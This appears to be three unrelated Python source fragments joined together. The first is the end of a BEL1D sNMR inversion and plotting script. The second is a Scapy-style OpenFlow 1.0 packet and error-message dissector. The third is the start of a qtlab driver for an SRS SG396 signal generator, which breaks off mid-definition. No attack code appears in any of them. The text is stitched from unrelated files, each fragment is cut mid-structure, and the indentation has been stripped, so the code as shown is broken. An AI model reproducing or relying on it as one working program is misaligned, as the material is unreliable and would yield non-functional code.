Prebel = BEL1D.PREBEL.POSTBEL2PREBEL(PREBEL=Prebel,POSTBEL=Postbel,Dataset=DatasetBench,NoiseModel=Noise,Simplified=True,nbMax=nbSampled,MixingRatio=Mixing)
# Since when iterating, the dataset is known, we are not computing the full relationship but only the posterior distributions directly to gain computation timing
print(idxIter+1)
Postbel = BEL1D.POSTBEL(Prebel)
Postbel.run(DatasetBench,nbSamples=nbSampled,NoiseModel=None)
means[idxIter,:], stds[idxIter,:] = Postbel.GetStats()
end = time.time()
timings[idxIter] = end-start
# The distance is computed on the normalized distributions. Therefore, the tolerance is relative.
diverge, distance = Tools.ConvergeTest(SamplesA=ModLastIter,SamplesB=Postbel.SAMPLES, tol=tolerance)
print('Wasserstein distance: {}'.format(distance))
if not(diverge) or (abs((distancePrevious-distance)/distancePrevious)*100<1):# If the distance between the distributions is not changing, we converged as well
# Convergence acheived if:
# 1) Distance below threshold
# 2) Distance does not vary significantly (less than 2.5%)
print('Model has converged at iter {}!'.format(idxIter+1))
MODELS_ITER[idxIter,:,:] = Postbel.SAMPLES
break
distancePrevious = distance
MODELS_ITER[idxIter,:,:] = Postbel.SAMPLES
start = time.time()
timings = timings[:idxIter+1]
means = means[:idxIter+1,:]
stds = stds[:idxIter+1,:]
MODELS_ITER = MODELS_ITER[:idxIter+1,:,:]
np.save('ModelsIteration',MODELS_ITER)
# 6) Graphs for the results:
Postbel.ShowDataset(RMSE=True)
CurrentGraph = pyplot.gcf()
CurrentGraph = CurrentGraph.get_axes()[0]
CurrentGraph.plot(TimingBench,DatasetBench[:len(TimingBench)],'k',linestyle='None',marker='o',markerfacecolor='None')
#Postbel.ShowPostCorr(TrueModel=ModelBench,OtherMethod=PRE_MODS)
Postbel.ShowPostModels(TrueModel=ModelBench,RMSE=True)
# Graph for the CCA space parameters loads
_, ax = pyplot.subplots()
B = Postbel.CCA.y_loadings_
B = np.divide(np.abs(B).T,np.repeat(np.reshape(np.sum(np.abs(B),axis=0),(1,B.shape[0])),B.shape[0],axis=0).T)
ind = np.asarray(range(B.shape[0]))+1
ax.bar(x=ind,height=B[0],label=r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][0]))
for i in range(B.shape[0]+1)[1:-1]:
ax.bar(x=ind,height=B[i],bottom=np.reshape(np.sum(B[0:i],axis=0),(B.shape[0],)),label=r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][i]))
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width, box.height*0.8])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.4), ncol=3)
ax.set_ylabel('Relative contribution')
ax.set_xlabel('CCA dimension')
pyplot.show(block=False)
# Add KDE graph at last iteration:
PrebelGraph = BEL1D.PREBEL.POSTBEL2PREBEL(PREBEL=PrebelLast,POSTBEL=PostbelLast, NoiseModel=Noise,RemoveOutlier=True,Simplified=True,nbMax=nbSampled,MixingRatio=Mixing)
PostbelGraph = BEL1D.POSTBEL(PREBEL=PrebelGraph)
print('Postbel for graphs initialized')
PostbelGraph.run(Dataset=DatasetBench, nbSamples=10000)
print('Printing KDE Graphs')
PostbelGraph.KDE.ShowKDE(Xvals=PostbelGraph.CCA.transform(PostbelGraph.PCA['Data'].transform(np.reshape(DatasetBench,(1,-1)))))
print('Total computation time: {} seconds'.format(np.sum(timings)))
# Comparison with McMC:
OtherMethod = np.load('Data/sNMR/SEG2020_Bench.npy')
fig = pyplot.figure(figsize=[10,10])# Creates the figure space
axs = fig.subplots(nbParam, nbParam)
for i in range(nbParam):
for j in range(nbParam):
if i == j: # Diagonal
if i != nbParam-1:
axs[i,j].get_shared_x_axes().join(axs[i,j],axs[-1,j])# Set the xaxis limit
axs[i,j].hist(np.squeeze(MODELS_ITER[0,:,j]),color='gray',density=True,alpha=0.5)
axs[i,j].hist(np.squeeze(MODELS_ITER[3,:,j]),color='b',density=True,alpha=0.5)
axs[i,j].hist(np.squeeze(MODELS_ITER[6,:,j]),color='m',density=True,alpha=0.5)
axs[i,j].hist(OtherMethod[:,j],color='y',density=True,alpha=0.5)
axs[i,j].hist(np.squeeze(MODELS_ITER[-1,:,j]),color='g',density=True,alpha=0.5)
axs[i,j].plot([ModelBench[i],ModelBench[i]],np.asarray(axs[i,j].get_ylim()),'r')
if nbParam > 8:
axs[i,j].set_xticks([])
axs[i,j].set_yticks([])
elif i > j: # Below the diagonal -> Scatter plot
if i != nbParam-1:
axs[i,j].get_shared_x_axes().join(axs[i,j],axs[-1,j])# Set the xaxis limit
if j != nbParam-1:
if i != nbParam-1:
axs[i,j].get_shared_y_axes().join(axs[i,j],axs[i,-1])# Set the yaxis limit
else:
axs[i,j].get_shared_y_axes().join(axs[i,j],axs[i,-2])# Set the yaxis limit
axs[i,j].plot(np.squeeze(MODELS_ITER[0,:,j]),np.squeeze(MODELS_ITER[0,:,i]),color='gray',linestyle='None',marker='.')
axs[i,j].plot(np.squeeze(MODELS_ITER[3,:,j]),np.squeeze(MODELS_ITER[3,:,i]),'.b')
axs[i,j].plot(np.squeeze(MODELS_ITER[6,:,j]),np.squeeze(MODELS_ITER[6,:,i]),'.m')
axs[i,j].plot(np.squeeze(MODELS_ITER[-1,:,j]),np.squeeze(MODELS_ITER[-1,:,i]),'.g')
axs[i,j].plot(ModelBench[j],ModelBench[i],'.r')
if nbParam > 8:
axs[i,j].set_xticks([])
axs[i,j].set_yticks([])
elif OtherMethod is not None:
if i != nbParam-1:
axs[i,j].get_shared_x_axes().join(axs[i,j],axs[-1,j])# Set the xaxis limit
if j != nbParam-1:
if i != 0:
axs[i,j].get_shared_y_axes().join(axs[i,j],axs[i,-1])# Set the yaxis limit
else:
axs[i,j].get_shared_y_axes().join(axs[i,j],axs[i,-2])# Set the yaxis limit
axs[i,j].plot(np.squeeze(MODELS_ITER[0,:,j]),np.squeeze(MODELS_ITER[0,:,i]),color='gray',linestyle='None',marker='.')
axs[i,j].plot(OtherMethod[:,j],OtherMethod[:,i],'.y')
axs[i,j].plot(ModelBench[j],ModelBench[i],'.r')
if nbParam > 8:
axs[i,j].set_xticks([])
axs[i,j].set_yticks([])
else:
axs[i,j].set_visible(False)
if j == 0: # First column of the graph
if ((i==0)and(j==0)) or not(i==j):
axs[i,j].set_ylabel(r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][i]))
if i == nbParam-1: # Last line of the graph
axs[i,j].set_xlabel(r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][j]))
if j == nbParam-1:
if not(i==j):
axs[i,j].yaxis.set_label_position("right")
axs[i,j].yaxis.tick_right()
axs[i,j].set_ylabel(r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][i]))
if i == 0:
axs[i,j].xaxis.set_label_position("top")
axs[i,j].xaxis.tick_top()
axs[i,j].set_xlabel(r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][j]))
fig.suptitle("Posterior model space visualtization")
from matplotlib.lines import Line2D
custom_lines = [Line2D([0], [0], color='gray', lw=4),
Line2D([0], [0], color='y', lw=4),
Line2D([0], [0], color='b', lw=4),
Line2D([0], [0], color='m', lw=4),
Line2D([0], [0], color='g', lw=4),
Line2D([0], [0], color='r', lw=4)]
fig.legend(custom_lines, ['Prior', 'DREAM', '3rd Iteration', '6th Iteration', 'Last Iteration', 'Benchmark'],loc='lower center',ncol=6)
for ax in axs.flat:
ax.label_outer()
pyplot.show(block=False)
# Graph with the models:
DREAM = OtherMethod # Already loaded
Prior = PRE_MODS
Iter5 = np.squeeze(MODELS_ITER[3,:,:])
Iter10 = np.squeeze(MODELS_ITER[6,:,:])
IterLast = np.squeeze(MODELS_ITER[-1,:,:])
pltidx = [1,4,2,5,8,3,6,9]
fig = pyplot.figure(figsize=[10,10])
for idx in range(8):
ax = pyplot.subplot(3,3,pltidx[idx])
pyplot.hist(Prior[:,idx].ravel(),bins=50,density=True,alpha=0.5,label='Prior')
pyplot.hist(Iter5[:,idx].ravel(),bins=50,density=True,alpha=0.5,label='3rd iteration')
pyplot.hist(Iter10[:,idx].ravel(),bins=50,density=True,alpha=0.5,label='6th iteration')
pyplot.hist(IterLast[:,idx].ravel(),bins=50,density=True,alpha=0.5,label='Last iteration')
pyplot.hist(DREAM[:,idx].ravel(),bins=50,density=True,alpha=0.5,label='DREAM')
ax.plot([ModelBench[idx],ModelBench[idx]],np.asarray(ax.get_ylim()),label='Benchmark')
pyplot.plot()
if pltidx[idx]==1:
ax.set_ylabel('Layer 1')
elif pltidx[idx]==4:
ax.set_ylabel('Layer 2')
elif pltidx[idx]==8:
ax.set_xlabel('Water content [/]')
elif pltidx[idx]==9:
ax.set_xlabel('Relaxation time [sec]')
handles, labels = ax.get_legend_handles_labels()
ax = pyplot.subplot(3,3,7)# Not used but labels needed
ax.set_xlabel('Thickness [m]')
ax.set_ylabel('Half-space')
ax.spines['bottom'].set_color('None')
ax.spines['top'].set_color('None')
ax.spines['right'].set_color('None')
ax.spines['left'].set_color('None')
ax.xaxis.set_ticks([])
ax.yaxis.set_ticks([])
#pyplot.axis('off')
CurrentGraph = pyplot.gcf()
CurrentGraph.legend(handles, labels,loc='lower center', ncol=6)
# Graph for the i-th pusle moment:
import matplotlib
from matplotlib import colors
from scipy import stats
RMS = np.sqrt(np.square(np.subtract(DatasetBench,Postbel.SAMPLESDATA)).mean(axis=-1))
quantiles = np.divide([stats.percentileofscore(RMS,a,'strict') for a in RMS],100)
sortIndex = np.argsort(RMS)
sortIndex = np.flip(sortIndex)
fig = pyplot.figure()
ax = fig.add_subplot(1, 1, 1)
colormap = matplotlib.cm.get_cmap('jet')
for j in sortIndex:
ax.plot(Postbel.MODPARAM.forwardFun["Axis"],np.squeeze(Postbel.SAMPLESDATA[j,-5*len(Postbel.MODPARAM.forwardFun["Axis"]):-4*len(Postbel.MODPARAM.forwardFun["Axis"])]),color=colormap(quantiles[j]))
ax.plot(TimingBench,DatasetBench[-5*len(Postbel.MODPARAM.forwardFun["Axis"]):-4*len(Postbel.MODPARAM.forwardFun["Axis"])],'k',linestyle='None',marker='o',markerfacecolor='None')
ax.set_xlabel(r'${}$'.format(Postbel.MODPARAM.paramNames["DataAxis"]),fontsize=14)
ax.set_ylabel(r'${}$'.format(Postbel.MODPARAM.paramNames["DataName"]),fontsize=14)
fig.subplots_adjust(bottom=0.30)
ax_colorbar = fig.add_axes([0.10, 0.15, 0.80, 0.05])
nb_inter = 1000
color_for_scale = colormap(np.linspace(0,1,nb_inter,endpoint=True))
cmap_scale = colors.ListedColormap(color_for_scale)
scale = [stats.scoreatpercentile(RMS,a,limit=(np.min(RMS),np.max(RMS)),interpolation_method='lower') for a in np.linspace(0,100,nb_inter,endpoint=True)]
norm = colors.BoundaryNorm(scale,len(color_for_scale))
data = np.atleast_2d(np.linspace(np.min(RMS),np.max(RMS),nb_inter,endpoint=True))
ax_colorbar.imshow(data, aspect='auto',cmap=cmap_scale,norm=norm)
ax_colorbar.set_xlabel('Root Mean Square Error {}'.format(Postbel.MODPARAM.paramNames["DataUnits"]),fontsize=12)
ax_colorbar.yaxis.set_visible(False)
nbTicks = 5
ax_colorbar.set_xticks(ticks=np.linspace(0,nb_inter,nbTicks,endpoint=True))
ax_colorbar.set_xticklabels(labels=round_to_5([stats.scoreatpercentile(RMS,a,limit=(np.min(RMS),np.max(RMS)),interpolation_method='lower') for a in np.linspace(0,100,nbTicks,endpoint=True)],n=5),rotation=15,ha='center')
pyplot.show()
################################################################################
### ###
### Case study: <NAME> ###
### ###
################################################################################
MtRigi = False
if MtRigi:
# Load the field data
from pygimli.physics import sNMR
Dataset = "Data/sNMR/SEG2020_MtRigi.mrsd"
Kernel = "Data/sNMR/SEG2020_MtRigi.mrsk"
ModelParam = sNMR.MRS()
sNMR.MRS.loadKernel(ModelParam,Kernel)
sNMR.MRS.loadMRSI(ModelParam,Dataset)
FieldData = np.ravel(ModelParam.dcube)
TimingField = ModelParam.t
Noise = 18 | |
1: "OFPT_ERROR",
2: "OFPT_ECHO_REQUEST",
3: "OFPT_ECHO_REPLY",
4: "OFPT_VENDOR",
5: "OFPT_FEATURES_REQUEST",
6: "OFPT_FEATURES_REPLY",
7: "OFPT_GET_CONFIG_REQUEST",
8: "OFPT_GET_CONFIG_REPLY",
9: "OFPT_SET_CONFIG",
10: "OFPT_PACKET_IN",
11: "OFPT_FLOW_REMOVED",
12: "OFPT_PORT_STATUS",
13: "OFPT_PACKET_OUT",
14: "OFPT_FLOW_MOD",
15: "OFPT_PORT_MOD",
16: "OFPT_STATS_REQUEST",
17: "OFPT_STATS_REPLY",
18: "OFPT_BARRIER_REQUEST",
19: "OFPT_BARRIER_REPLY",
20: "OFPT_QUEUE_GET_CONFIG_REQUEST",
21: "OFPT_QUEUE_GET_CONFIG_REPLY" }
class OFPTHello(_ofp_header):
name = "OFPT_HELLO"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 0, ofp_type),
ShortField("len", None),
IntField("xid", 0) ]
overload_fields = {TCP: {"sport": 6653}}
#####################################################
#################### OFPT_ERROR #####################
#####################################################
### this class will be used to display some messages
### sent back by the switch after an error
class OFPacketField(PacketField):
def getfield(self, pkt, s):
try:
l = s[2:4]
l = struct.unpack("!H", l)[0]
ofload = s[:l]
remain = s[l:]
return remain, OpenFlow(None, ofload)(ofload)
except:
return "", Raw(s)
ofp_error_type = { 0: "OFPET_HELLO_FAILED",
1: "OFPET_BAD_REQUEST",
2: "OFPET_BAD_ACTION",
3: "OFPET_FLOW_MOD_FAILED",
4: "OFPET_PORT_MOD_FAILED",
5: "OFPET_QUEUE_OP_FAILED" }
class OFPETHelloFailed(_ofp_header):
name = "OFPET_HELLO_FAILED"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 0, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPHFC_INCOMPATIBLE",
1: "OFPHFC_EPERM" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPETBadRequest(_ofp_header):
name = "OFPET_BAD_REQUEST"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 1, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPBRC_BAD_VERSION",
1: "OFPBRC_BAD_TYPE",
2: "OFPBRC_BAD_STAT",
3: "OFPBRC_BAD_VENDOR",
4: "OFPBRC_BAD_SUBTYPE",
5: "OFPBRC_EPERM",
6: "OFPBRC_BAD_LEN",
7: "OFPBRC_BUFFER_EMPTY",
8: "OFPBRC_BUFFER_UNKNOWN" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPETBadAction(_ofp_header):
name = "OFPET_BAD_ACTION"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 2, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPBAC_BAD_TYPE",
1: "OFPBAC_BAD_LEN",
2: "OFPBAC_BAD_VENDOR",
3: "OFPBAC_BAD_VENDOR_TYPE",
4: "OFPBAC_BAD_OUT_PORT",
5: "OFPBAC_BAD_ARGUMENT",
6: "OFPBAC_EPERM",
7: "OFPBAC_TOO_MANY",
8: "OFPBAC_BAD_QUEUE" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPETFlowModFailed(_ofp_header):
name = "OFPET_FLOW_MOD_FAILED"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 3, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPFMFC_ALL_TABLES_FULL",
1: "OFPFMFC_OVERLAP",
2: "OFPFMFC_EPERM",
3: "OFPFMFC_BAD_EMERG_TIMEOUT",
4: "OFPFMFC_BAD_COMMAND",
5: "OFPFMFC_UNSUPPORTED" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPETPortModFailed(_ofp_header):
name = "OFPET_PORT_MOD_FAILED"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 4, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPPMFC_BAD_PORT",
1: "OFPPMFC_BAD_HW_ADDR" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPETQueueOpFailed(_ofp_header):
name = "OFPET_QUEUE_OP_FAILED"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 5, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPQOFC_BAD_PORT",
1: "OFPQOFC_BAD_QUEUE",
2: "OFPQOFC_EPERM" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
# ofp_error_cls allows generic method OpenFlow() to choose the right class for dissection
ofp_error_cls = { 0: OFPETHelloFailed,
1: OFPETBadRequest,
2: OFPETBadAction,
3: OFPETFlowModFailed,
4: OFPETPortModFailed,
5: OFPETQueueOpFailed }
################ end of OFPT_ERRORS #################
class OFPTEchoRequest(_ofp_header):
name = "OFPT_ECHO_REQUEST"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 2, ofp_type),
ShortField("len", None),
IntField("xid", 0) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTEchoReply(_ofp_header):
name = "OFPT_ECHO_REPLY"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 3, ofp_type),
ShortField("len", None),
IntField("xid", 0) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTVendor(_ofp_header):
name = "OFPT_VENDOR"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 4, ofp_type),
ShortField("len", None),
IntField("xid", 0),
IntField("vendor", 0) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTFeaturesRequest(_ofp_header):
name = "OFPT_FEATURES_REQUEST"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 5, ofp_type),
ShortField("len", None),
IntField("xid", 0) ]
overload_fields = {TCP: {"sport": 6653}}
ofp_action_types_flags = ofp_action_types.values()[:-1] # no ofpat_vendor flag
class OFPTFeaturesReply(_ofp_header):
name = "OFPT_FEATURES_REPLY"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 6, ofp_type),
ShortField("len", None),
IntField("xid", 0),
LongField("datapath_id", 0),
IntField("n_buffers", 0),
ByteField("n_tables", 1),
X3BytesField("pad", 0),
FlagsField("capabilities", 0, 32, [ "FLOW_STATS",
"TABLE_STATS",
"PORT_STATS",
"STP",
"RESERVED",
"IP_REASM",
"QUEUE_STATS",
"ARP_MATCH_IP" ]),
FlagsField("actions", 0, 32, ofp_action_types_flags),
PacketListField("ports", None, OFPPhyPort,
length_from=lambda pkt:pkt.len-32) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTGetConfigRequest(_ofp_header):
name = "OFPT_GET_CONFIG_REQUEST"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 7, ofp_type),
ShortField("len", None),
IntField("xid", 0) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTGetConfigReply(_ofp_header):
name = "OFPT_GET_CONFIG_REPLY"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 8, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("flags", 0, { 0: "FRAG_NORMAL",
1: "FRAG_DROP",
2: "FRAG_REASM",
3: "FRAG_MASK" }),
ShortField("miss_send_len", 0) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTSetConfig(_ofp_header):
name = "OFPT_SET_CONFIG"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 9, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("flags", 0, { 0: "FRAG_NORMAL",
1: "FRAG_DROP",
2: "FRAG_REASM",
3: "FRAG_MASK" }),
ShortField("miss_send_len", 128) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTPacketIn(_ofp_header):
name = "OFPT_PACKET_IN"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 10, ofp_type),
ShortField("len", None),
IntField("xid", 0),
IntEnumField("buffer_id", "NO_BUFFER", ofp_buffer),
ShortField("total_len", 0),
ShortEnumField("in_port", 0, ofp_port_no),
ByteEnumField("reason", 0, { 0: "OFPR_NO_MATCH",
1: "OFPR_ACTION" }),
XByteField("pad", 0),
PacketField("data", None, Ether) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTFlowRemoved(_ofp_header):
name = "OFPT_FLOW_REMOVED"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 11, ofp_type),
ShortField("len", None),
IntField("xid", 0),
PacketField("match", OFPMatch(), OFPMatch),
LongField("cookie", 0),
ShortField("priority", 0),
ByteEnumField("reason", 0, { 0: "OFPRR_IDLE_TIMEOUT",
1: "OFPRR_HARD_TIMEOUT",
2: "OFPRR_DELETE" }),
XByteField("pad1", 0),
IntField("duration_sec", 0),
IntField("duration_nsec", 0),
ShortField("idle_timeout", 0),
XShortField("pad2", 0),
LongField("packet_count", 0),
LongField("byte_count", 0) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTPortStatus(_ofp_header):
name = "OFPT_PORT_STATUS"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 12, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ByteEnumField("reason", 0, { 0: "OFPPR_ADD",
1: "OFPPR_DELETE",
2: "OFPPR_MODIFY" }),
XBitField("pad", 0, 56),
PacketField("desc", OFPPhyPort(), OFPPhyPort) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTPacketOut(_ofp_header):
name = "OFPT_PACKET_OUT"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 13, ofp_type),
ShortField("len", None),
IntField("xid", 0),
IntEnumField("buffer_id", "NO_BUFFER", ofp_buffer),
ShortEnumField("in_port", "NONE", ofp_port_no),
FieldLenField("actions_len", None, fmt="H", length_of="actions"),
ActionPacketListField("actions", [], Packet,
length_from=lambda pkt:pkt.actions_len),
PacketField("data", None, Ether) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTFlowMod(_ofp_header):
name = "OFPT_FLOW_MOD"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 14, ofp_type),
ShortField("len", None),
IntField("xid", 0),
PacketField("match", OFPMatch(), OFPMatch),
LongField("cookie", 0),
ShortEnumField("cmd", 0, { 0: "OFPFC_ADD",
1: "OFPFC_MODIFY",
2: "OFPFC_MODIFY_STRICT",
3: "OFPFC_DELETE",
4: "OFPFC_DELETE_STRICT" }),
ShortField("idle_timeout", 0),
ShortField("hard_timeout", 0),
ShortField("priority", 0),
IntEnumField("buffer_id", "NO_BUFFER", ofp_buffer),
ShortEnumField("out_port", "NONE", ofp_port_no),
FlagsField("flags", 0, 16, [ "SEND_FLOW_REM",
"CHECK_OVERLAP",
"EMERG" ]),
ActionPacketListField("actions", [], Packet,
length_from=lambda pkt:pkt.len-72) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTPortMod(_ofp_header):
name = "OFPT_PORT_MOD"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 15, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("port_no", 0, ofp_port_no),
MACField("hw_addr", "0"),
FlagsField("config", 0, 32, ofp_port_config),
FlagsField("mask", 0, 32, ofp_port_config),
FlagsField("advertise", 0, 32, ofp_port_features),
IntField("pad", 0) ]
overload_fields = {TCP: {"sport": 6653}}
#####################################################
##################### OFPT_STATS ####################
#####################################################
ofp_stats_types = { 0: "OFPST_DESC",
1: "OFPST_FLOW",
2: "OFPST_AGGREGATE",
3: "OFPST_TABLE",
4: "OFPST_PORT",
5: "OFPST_QUEUE",
65535: "OFPST_VENDOR" }
class OFPTStatsRequestDesc(_ofp_header):
name = "OFPST_STATS_REQUEST_DESC"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 16, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("stats_type", 0, ofp_stats_types),
FlagsField("flags", 0, 16, []) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTStatsReplyDesc(_ofp_header):
name = "OFPST_STATS_REPLY_DESC"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 17, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("stats_type", 0, ofp_stats_types),
FlagsField("flags", 0, 16, []),
StrFixedLenField("mfr_desc", "", 256),
StrFixedLenField("hw_desc", "", 256),
StrFixedLenField("sw_desc", "", 256),
StrFixedLenField("serial_num", "", 32),
StrFixedLenField("dp_desc", "", 256) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTStatsRequestFlow(_ofp_header):
name = "OFPST_STATS_REQUEST_FLOW"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 16, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("stats_type", 1, ofp_stats_types),
FlagsField("flags", 0, 16, []),
PacketField("match", OFPMatch(), OFPMatch),
ByteEnumField("table_id", "ALL", ofp_table),
ByteField("pad", 0),
ShortEnumField("out_port", "NONE", ofp_port_no) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPFlowStats(Packet):
def post_build(self, p, pay):
if self.length is None:
l = len(p)+len(pay)
p = struct.pack("!H", l) + p[2:]
return p + pay
name = "OFP_FLOW_STATS"
fields_desc = [ ShortField("length", None),
ByteField("table_id", 0),
XByteField("pad1", 0),
PacketField("match", OFPMatch(), OFPMatch),
IntField("duration_sec", 0),
IntField("duration_nsec", 0),
ShortField("priority", 0),
ShortField("idle_timeout", 0),
ShortField("hard_timeout", 0),
XBitField("pad2", 0, 48),
LongField("cookie", 0),
LongField("packet_count", 0),
LongField("byte_count", 0),
ActionPacketListField("actions", [], Packet,
length_from=lambda pkt:pkt.length-88) ]
class FlowStatsPacketListField(PacketListField):
@staticmethod
def _get_flow_stats_length(s):
return struct.unpack("!H", s[:2])[0]
def getfield(self, pkt, s):
lst = []
remain = s
while remain:
l = FlowStatsPacketListField._get_flow_stats_length(remain)
current = remain[:l]
remain = remain[l:]
p = OFPFlowStats(current)
lst.append(p)
return remain, lst
class OFPTStatsReplyFlow(_ofp_header):
name = "OFPST_STATS_REPLY_FLOW"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 17, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("stats_type", 1, ofp_stats_types),
FlagsField("flags", 0, 16, []),
FlowStatsPacketListField("flow_stats", [], Packet,
length_from=lambda pkt:pkt.len-12) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTStatsRequestAggregate(_ofp_header):
name = "OFPST_STATS_REQUEST_AGGREGATE"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 16, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("stats_type", 2, ofp_stats_types),
FlagsField("flags", 0, 16, []),
PacketField("match", OFPMatch(), OFPMatch),
ByteEnumField("table_id", "ALL", ofp_table),
ByteField("pad", 0),
ShortEnumField("out_port", "NONE", ofp_port_no) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTStatsReplyAggregate(_ofp_header):
name = "OFPST_STATS_REPLY_AGGREGATE"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 17, ofp_type),
ShortField("len", None),
IntField("xid", 0),
| |
<reponame>sourav-majumder/qtlab<gh_stars>0
# <NAME> <<EMAIL>>, 2008
# <NAME> <<EMAIL>>, 2008
# <NAME> <<EMAIL>>, 2015
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from instrument import Instrument
import visa
import types
import logging
import numpy as np
import qt
class SRS_SG396(Instrument):
'''
This is the driver for the SRS SG396 Vector Signal Genarator
Usage:
Initialize with
<name> = instruments.create('<name>', 'SRS_SG396', address='<GBIP address>, reset=<bool>')
'''
def __init__(self, name, address, reset=False):
'''
Initializes the SRS_SG396, and communicates with the wrapper.
Input:
name (string) : name of the instrument
address (string) : GPIB address
reset (bool) : resets to default values, default=False
'''
logging.info(__name__ + ' : Initializing instrument SRS_SG396')
Instrument.__init__(self, name, tags=['physical'])
# Add some global constants
self._address = address
self._visainstrument = visa.ResourceManager().open_resource(self._address, timeout=2000) # timeout is in milliseconds
try:
self._visainstrument.read_termination = '\n'
self._visainstrument.write_termination = '\n'
self.MAX_BNC_FREQ = 62.5e6
self.MIN_N_FREQ = 950e3
self.add_parameter('power',
